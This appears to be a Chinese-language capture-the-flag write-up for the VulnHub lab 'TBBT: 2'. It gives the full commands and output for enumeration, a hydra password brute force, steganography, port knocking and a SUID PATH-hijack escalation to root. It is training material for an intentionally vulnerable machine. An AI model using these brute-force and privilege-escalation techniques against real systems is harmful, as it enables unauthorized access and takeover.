TBBT2
作者: jason huawen
靶机信息
名称:TBBT: 2 - FunWithFlags
地址:
https://www.vulnhub.com/entry/tbbt-2-funwithflags,461/
识别目标主机IP地址
(kali㉿kali)-[~/Vulnhub/TBBT2]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:06 1 60 Unknown vendor
192.168.56.100 08:00:27:db:23:d3 1 60 PCS Systemtechnik GmbH
192.168.56.103 08:00:27:a7:0c:3e 1 60 PCS Systemtechnik GmbH
利用Kali Linux的netdiscover工具识别目标主机IP地址为192.168.56.103
NMAP扫描
──(kali㉿kali)-[~/Vulnhub/TBBT2]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.103 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 08:23 EST
Nmap scan report for localhost (192.168.56.103)
Host is up (0.00030s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp closed ftp
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 08:00:27:A7:0C:3E (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 116.13 seconds
获得Shell
──(kali㉿kali)-[~/Vulnhub/TBBT2]
└─$ curl http://192.168.56.103
<h2>Welcome to tbbt2.local web server</h2>
This is <b>sheldon</b> lee cooper Ph.D,Sc.D speaking</br>
Dear visitor, our previous server was pretty insecure.</br>
This time the server is strictly personal and I have taken extra measures to only allow me to login.</br>
</br>
No sloppy astrophysicists creating vulnerable websites.</br>
No physicists from Princeton that can't code a proper python script</br>
No engineers using weak passwords, asides being engineers</br>
</br>
<img src="me.jpg" style="height: 50%"/>
<!--Hint for my future self in case I forget my password /fyhd7fhf84ihdiksowj -->
注释中有密码:/fyhd7fhf84ihdiksowj,但不知道是什么应用的密码,以及用户名(备注:后来证明这段字符串并不是密码而是目录名)
出现主机名: tbbt2.local,以及姓名:sheldon,可能是用户名
┌──(kali㉿kali)-[~/Vulnhub/TBBT2]
└─$ curl http://192.168.56.103/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at 192.168.56.103 Port 80</address>
</body></html>
──(kali㉿kali)-[~/Vulnhub/TBBT2]
└─$ nikto -h http://192.168.56.103
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.103
+ Target Hostname: 192.168.56.103
+ Target Port: 80
+ Start Time: 2023-03-09 05:21:08 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 43b, size: 5a2e017ba2403, mtime: gzip
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: HEAD, GET, POST, OPTIONS
+ OSVDB-3092: /secret/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time: 2023-03-09 05:21:58 (GMT-5) (50 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
nikto工具发现了/secret目录,访问该目录,发现浏览器在查询tbbt2.local,将其加入到/etc/hosts文件中去:
┌──(kali㉿kali)-[~/Vulnhub/TBBT2]
└─$ sudo vim /etc/hosts
[sudo] password for kali:
┌──(kali㉿kali)-[~/Vulnhub/TBBT2]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.56.103 tbbt2.local
再次用浏览器访问/secret目录,发现自动定向到目录:
http://tbbt2.local/secret/A/G/N/I/Z/A/B/
──(kali㉿kali)-[~/Vulnhub/TBBT2]
└─$ gobuster dir -u http://192.168.56.103 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh,.js
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.103
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: php,html,txt,sh,js
[+] Timeout: 10s
===============================================================
2023/03/09 05:22:52 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 1083]
/password.txt (Status: 200) [Size: 133]
/secret (Status: 301) [Size: 317] [--> http://192.168.56.103/secret/]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 1322392 / 1323366 (99.93%)===============================================================
2023/03/09 05:25:41 Finished
===============================================================
gobuster工具又发现了一个文件/password.txt
┌──(kali㉿kali)-[~/Vulnhub/TBBT2]
└─$ curl http://192.168.56.103/password.txt
Password reminder in case I get a head trauma resulting in amnesia.
I have hidden the first characters. (lowercase letters)
***train
但是到目前为止还没找到需要用户登录的入口?
其实前面找到的:/fyhd7fhf84ihdiksowj并不是密码,而是目录
┌──(kali㉿kali)-[~/Vulnhub/TBBT2]
└─$ curl http://tbbt2.local/fyhd7fhf84ihdiksowj/
<html>
<head>
<script language="Javascript" src="5hf7eh39djkf83h2ikfo.js"></script>
</head>
<body>
</body>
</html>
http://tbbt2.local/fyhd7fhf84ihdiksowj/5hf7eh39djkf83h2ikfo.js
┌──(kali㉿kali)-[~/Vulnhub/TBBT2]
└─$ curl http://tbbt2.local/fyhd7fhf84ihdiksowj/5hf7eh39djkf83h2ikfo.js
// good luck with deobfuscation
// the easy way or the hard way? which one will you take?
var erp = new Array;
erp[0] = 1008813135;
erp[1] = 1129601360;
erp[2] = 1159751796;
erp[3] = 1835810317;
erp[4] = 171731060;
erp[5] = 1835810317;
erp[6] = 168626748;
erp[7] = 1751474532;
erp[8] = 1041041952;
erp[9] = 540832873;
erp[10] = 1953260862;
erp[11] = 1164797298;
erp[12] = 1734700643;
erp[13] = 2032169573;
erp[14] = 1835626084;
erp[15] = 1701985327;
erp[16] = 1953068140;
erp[17] = 1698565386;
erp[18] = 1009739877;
erp[19] = 1633959437;
erp[20] = 168626748;
erp[21] = 1651467385;
erp[22] = 1041041933;
erp[23] = 171730995;
erp[24] = 1044669793;
erp[25] = 1914726005;
erp[26] = 1953854053;
erp[27] = 542337125;
erp[28] = 1818521454;
erp[29] = 1009739827;
erp[30] = 1041041980;
erp[31] = 1883134319;
erp[32] = 1965058926;
erp[33] = 1870078071;
erp[34] = 1751217184;
erp[35] = 1953439844;
erp[36] = 1865162873;
erp[37] = 1869946989;
erp[38] = 1633969440;
erp[39] = 1952999795;
erp[40] = 557592432;
erp[41] = 1041041980;
erp[42] = 556608854;
erp[43] = 1629515886;
erp[44] = 1718755446;
erp[45] = 1931506530;
erp[46] = 1702130279;
erp[47] = 544893984;
erp[48] = 1668179558;
erp[49] = 1784833393;
erp[50] = 542515317;
erp[51] = 1852404256;
erp[52] = 1734484084;
erp[53] = 1646290786;
erp[54] = 539977589;
erp[55] = 1918854514;
erp[56] = 1853448038;
erp[57] = 1919968626;
erp[58] = 1734308214;
erp[59] = 1696624225;
erp[60] = 1897952098;
erp[61] = 2037998186;
erp[62] = 544306789;
erp[63] = 1919969142;
erp[64] = 1650550317;
erp[65] = 759041290;
erp[66] = 218774575;
erp[67] = 1651467385;
erp[68] = 1041041933;
erp[69] = 171716456;
erp[70] = 1953328190;
erp[71] = 218762506;
erp[72] = 3338;
var em = '';
for(i=0;i<erp.length;i++){
tmp = erp[i];
if(Math.floor((tmp/Math.pow(256,3)))>0){
em += String.fromCharCode(Math.floor((tmp/Math.pow(256,3))));
};
tmp = tmp - (Math.floor((tmp/Math.pow(256,3))) * Math.pow(256,3));
if(Math.floor((tmp/Math.pow(256,2)))>0){
em += String.fromCharCode(Math.floor((tmp/Math.pow(256,2))));
};
tmp = tmp - (Math.floor((tmp/Math.pow(256,2))) * Math.pow(256,2));
if(Math.floor((tmp/Math.pow(256,1)))>0){
em += String.fromCharCode(Math.floor((tmp/Math.pow(256,1))));
};
tmp = tmp - (Math.floor((tmp/Math.pow(256,1))) * Math.pow(256,1));
if(Math.floor((tmp/Math.pow(256,0)))>0){
em += String.fromCharCode(Math.floor((tmp/Math.pow(256,0))));
};
};
document.write(em);
拷贝js代码,在浏览器开发者工具中执行(将最后一句改为:console.log(alert)em)
用在线网站去运行上述代码:
https://www.guru99.com/execute-javascript-online.html#:~:text=Follow%20the%20simple%20steps%20below%20to%20compile%20and,editor.%20Step-2%20Click%20Run%20to%20get%20Output.%20
得到如下代码:
<!DOCTYPE html>
<html>
<head>
<title>Emergency reminder</title>
</head>
<body>
<h3>Dear future Sheldon</h3>
<p>You know what to do, you made this!</p>
<!--Va pnfr vs sbetrg zl cnffjbeq V unir gb tb gb /gur_erny_frperg_qve naq sbyybj qverpgvbaf-->
</body>
</html>
需要将
Va pnfr vs sbetrg zl cnffjbeq V unir gb tb gb /gur_erny_frperg_qve naq sbyybj qverpgvbaf
用ROT13进行解码:
In case if forget my password I have to go to /the_real_secret_dir and follow directions
发现了目录/the_real_secret_dir,访问该目录,弹出网页基本认证,接下来需要首先产生密码字典,然后用hydra工具进行破解:
┌──(kali㉿kali)-[~/Vulnhub/TBBT2]
└─$ crunch 8 8 -t @@@train > password.dict
Crunch will now generate the following amount of data: 158184 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 17576
┌──(kali㉿kali)-[~/Vulnhub/TBBT2]
└─$ ls
me.jpg nmap_full_scan password.dict
┌──(kali㉿kali)-[~/Vulnhub/TBBT2]
└─$ hydra -l sheldon -P password.dict -f 192.168.56.103 -s 80 http-get /the_real_secret_dir
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-09 06:22:50
[DATA] max 16 tasks per 1 server, overall 16 tasks, 17576 login tries (l:1/p:17576), ~1099 tries per task
[DATA] attacking http-get://192.168.56.103:80/the_real_secret_dir
[STATUS] 8728.00 tries/min, 8728 tries in 00:01h, 8848 to do in 00:02h, 16 active
[80][http-get] host: 192.168.56.103 login: sheldon password: oldtrain
[STATUS] attack finished for 192.168.56.103 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-09 06:23:56
破解得到密码,登录:
返回页面内容:
Every door comes with a key, here is yours:
Password: /the_real_secret_dir/p4ssw0rd.txt Now that you have found the key, you also have to find the door
http://tbbt2.local/the_real_secret_dir/p4ssw0rd.txt
Soft kitty, warm kitty
Little ball of fur
Happy kitty, sleepy kitty
Purr, purr, purr
根据别人的做法,这是一种利用空格的隐写方法
┌──(kali㉿kali)-[~/Vulnhub/TBBT2]
└─$ stegsnow -C stegno.txt
Every door comes with a key, here is yours:</br>
Password: /the_real_secret_dir/p4ssw0rd.txt
Now that you have found the key, you also have to find the door</br>
<font color="white">(Hint for my future self: I dont like handshakes, so I dont use them)</font></br>
<img src="alwaysknock3times.gif" alt="Always be polite and knock 3 times"></br>
<img src="secret_message.jpg" alt="Here is your door"></br>
从knock 3 times,可知应该有端口knock
secret_message.jpg的图片是用Klingond编码
用下面的网站解码:
https://www.dcode.fr/klingon-language
得到1000 2000 3000
这应该是端口号
┌──(kali㉿kali)-[~/Vulnhub/TBBT2]
└─$ knock -u 192.168.56.103 1000 2000 3000
┌──(kali㉿kali)-[~/Vulnhub/TBBT2]
└─$ nmap 192.168.56.103
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-09 06:40 EST
Nmap scan report for tbbt2.local (192.168.56.103)
Host is up (0.00041s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp closed ftp
22/tcp open ssh
80/tcp open http
经过端口knock后,ssh端口开放:
密码即为ilikekling
──(kali㉿kali)-[~/Vulnhub/TBBT2]
└─$ ssh [email protected]
[email protected]'s password:
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 5.3.0-46-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
0 packages can be updated.
0 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Your Hardware Enablement Stack (HWE) is supported until April 2023.
Last login: Tue Apr 7 00:54:00 2020 from 192.168.1.109
sheldon@tbbt2:~$ id
uid=1001(sheldon) gid=1001(sheldon) groups=1001(sheldon)
Broadcast message from root@tbbt2 (somewhere) (Thu Mar 9 15:34:01 2023):
Antihacker script activated
Broadcast message from root@tbbt2 (somewhere) (Thu Mar 9 15:35:01 2023):
Antihacker script activated
sheldon@tbbt2:~$ cat flag.txt
flag{58f871e6477adff278f49ff84a1c14d7}
sheldon@tbbt2:~$ cat .bash_history
history -w
sheldon@tbbt2:~$ sudo -l
[sudo] password for sheldon:
Sorry, try again.
[sudo] password for sheldon:
Sorry, user sheldon may not run sudo on tbbt2.
sheldon@tbbt2:~$
提权
sheldon@tbbt2:/tmp$ find / -perm -4000 -type f 2>/dev/null
/home/sheldon/Desktop/iliketrains
可以利用iliketrains的SUID位进行提权,通过查看其C源代码,可以生成sl文件进行提权
sheldon@tbbt2:~/Desktop$ echo '/bin/bash' > sl
sheldon@tbbt2:~/Desktop$ chmod 777 sl
sheldon@tbbt2:~/Desktop$ export PATH=/home/sheldon/Desktop:$PATH
sheldon@tbbt2:~/Desktop$ ls -alh
total 32K
drwxr-xr-x 2 sheldon sheldon 4,0K Μαρ 9 15:42 .
drwxr-xr-x 15 sheldon sheldon 4,0K Απρ 7 2020 ..
-rwxr-x--- 1 root root 225 Απρ 7 2020 .antihacker.py
-rwsr-xr-x 1 root root 8,2K Απρ 7 2020 iliketrains
-rw-r--r-- 1 root root 71 Απρ 7 2020 .iliketrains.c
-rwxrwxrwx 1 sheldon sheldon 10 Μαρ 9 15:42 sl
sheldon@tbbt2:~/Desktop$ ./iliketrains
root@tbbt2:~/Desktop# cd /root
root@tbbt2:/root# ls
Desktop Downloads Music Public Videos
Documents flag.txt Pictures Templates
root@tbbt2:/root# cat flag.txt
Good job, you pwned me!
The flag is a real amazon gift card.
You could buy an InfoSec book or some toilet paper, its up to you.
If you think you are the first to solve this go claim it, ASAP!
flag{DNSK-N2ZBE7-4GAE}
经验教训
-
本靶机的第一个关键是对注释:Hint for my future self in case I forget my password /fyhd7fhf84ihdiksowj的理解,如果把这字符串理解为密码,那么就将进入死胡同,其实作者提示有/符号
-
访问上述目录后得到JS代码,可以通过在线网站去执行该代码(不知道什么原因在浏览器的console执行有问题)
-
crunch工具生成字典方法:
t 命令如下:
-t @,%^,指定模式,@,%^分别代表意义如下:
@ 插入小写字母
, 插入大写字母
% 插入数字
^ 插入特殊符号